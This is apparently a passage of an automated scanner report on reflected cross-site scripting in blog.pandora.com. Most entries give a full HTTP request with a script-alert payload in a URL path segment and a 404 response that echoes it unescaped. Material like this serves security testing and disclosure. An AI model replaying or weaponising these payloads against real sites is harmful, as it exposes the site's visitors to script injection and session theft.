GET /pandoraefa04<script>alert(1)</script>a909529678b/archives/2009/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraefa04<script>alert(1)</script>a909529678b/archives/2009/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bc94c<script>alert(1)</script>9dc1dabafdc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbc94c<script>alert(1)</script>9dc1dabafdc/2009/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:44 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbc94c<script>alert(1)</script>9dc1dabafdc/2009/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c2a57<script>alert(1)</script>b7dc6cce338 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009c2a57<script>alert(1)</script>b7dc6cce338/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009c2a57<script>alert(1)</script>b7dc6cce338/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61662<script>alert(1)</script>e1daff6cf96 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/0361662<script>alert(1)</script>e1daff6cf96/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:49 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/0361662<script>alert(1)</script>e1daff6cf96/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7af11<script>alert(1)</script>1a13f4a03d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora7af11<script>alert(1)</script>1a13f4a03d2/archives/2009/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora7af11<script>alert(1)</script>1a13f4a03d2/archives/2009/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload beaf3<script>alert(1)</script>b750ded26f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbeaf3<script>alert(1)</script>b750ded26f8/2009/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbeaf3<script>alert(1)</script>b750ded26f8/2009/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68bf4<script>alert(1)</script>2d188b48660 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200968bf4<script>alert(1)</script>2d188b48660/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:36 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200968bf4<script>alert(1)</script>2d188b48660/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7adfa<script>alert(1)</script>b1f6f7ee47a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/047adfa<script>alert(1)</script>b1f6f7ee47a/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/047adfa<script>alert(1)</script>b1f6f7ee47a/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee40e<script>alert(1)</script>6dc1333d8df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraee40e<script>alert(1)</script>6dc1333d8df/archives/2009/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraee40e<script>alert(1)</script>6dc1333d8df/archives/2009/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 83b92<script>alert(1)</script>91c0dbd346e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives83b92<script>alert(1)</script>91c0dbd346e/2009/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives83b92<script>alert(1)</script>91c0dbd346e/2009/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7b54d<script>alert(1)</script>4def9d0af6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20097b54d<script>alert(1)</script>4def9d0af6/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 348 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20097b54d<script>alert(1)</script>4def9d0af6/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4fdb9<script>alert(1)</script>8f219a229f4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/054fdb9<script>alert(1)</script>8f219a229f4/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:38 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/054fdb9<script>alert(1)</script>8f219a229f4/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ddb1<script>alert(1)</script>d964ffd68f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora5ddb1<script>alert(1)</script>d964ffd68f4/archives/2009/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora5ddb1<script>alert(1)</script>d964ffd68f4/archives/2009/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40560<script>alert(1)</script>8295fb9672e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives40560<script>alert(1)</script>8295fb9672e/2009/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives40560<script>alert(1)</script>8295fb9672e/2009/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 35d6a<script>alert(1)</script>61d8424a6b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200935d6a<script>alert(1)</script>61d8424a6b1/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200935d6a<script>alert(1)</script>61d8424a6b1/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6dc78<script>alert(1)</script>f9f9f8b2891 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/066dc78<script>alert(1)</script>f9f9f8b2891/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/066dc78<script>alert(1)</script>f9f9f8b2891/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ea0d3<script>alert(1)</script>7e8e5ab80a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraea0d3<script>alert(1)</script>7e8e5ab80a9/archives/2009/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraea0d3<script>alert(1)</script>7e8e5ab80a9/archives/2009/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e6355<script>alert(1)</script>dcc343d2bd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivese6355<script>alert(1)</script>dcc343d2bd0/2009/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivese6355<script>alert(1)</script>dcc343d2bd0/2009/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bdd32<script>alert(1)</script>e2655d97c30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009bdd32<script>alert(1)</script>e2655d97c30/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:36 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009bdd32<script>alert(1)</script>e2655d97c30/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b55f0<script>alert(1)</script>a60f65ec066 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/07b55f0<script>alert(1)</script>a60f65ec066/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
